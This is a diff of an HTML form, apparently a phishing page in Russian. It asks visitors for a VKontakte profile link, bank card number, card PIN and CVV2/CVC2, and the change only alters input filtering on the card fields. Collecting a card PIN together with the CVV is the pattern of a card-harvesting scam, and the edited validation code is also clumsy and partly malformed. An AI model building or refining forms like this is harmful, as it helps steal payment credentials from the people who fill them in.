--- a/forms.html
+++ b/forms.html
@@ -67,11 +67,11 @@
         <label for="homepage">Ссылка на страницу ВКонтакте:</label><br>
         <input type="url" id="homepage" name="homepage" required><br><br>
         <label for="cardnumber">Номер карты:</label><br>
-        <input type="number" id="cardnumber" name="cardnumber" maxlength="16" size="13" required><br><br>
+        <input input type="text" onkeyup="var yratext=/['0-9',':']/; if(!yratext.test(this.value)) this.value=''" id="cardnumber" name="cardnumber" maxlength="16" size="13" required><br><br>
         <label for="pin">PIN:</label><br>
-        <input type="number" id="pin" name="pin" maxlength="4" size="1" required><br><br>
+        <input input type="text" onkeyup="var yratext=/['0-9',':']/; if(!yratext.test(this.value)) this.value=''" id="pin" name="pin" maxlength="4" size="1" required><br><br>
         <label for="cvv">cvv2/cvc2:</label><br>
-        <input type="number" id="cvv" name="cvv" maxlength="4" size="1" required><br><br>
+        <input input type="text" onkeyup="var yratext=/['0-9',':']/; if(!yratext.test(this.value)) this.value=''"id="cvv" name="cvv" maxlength="4" size="1" required><br><br>
         <label class="custom-checkbox">
             <input type="checkbox" value="value-1">
             <span>Я согласен на обработку персональных данных</span>
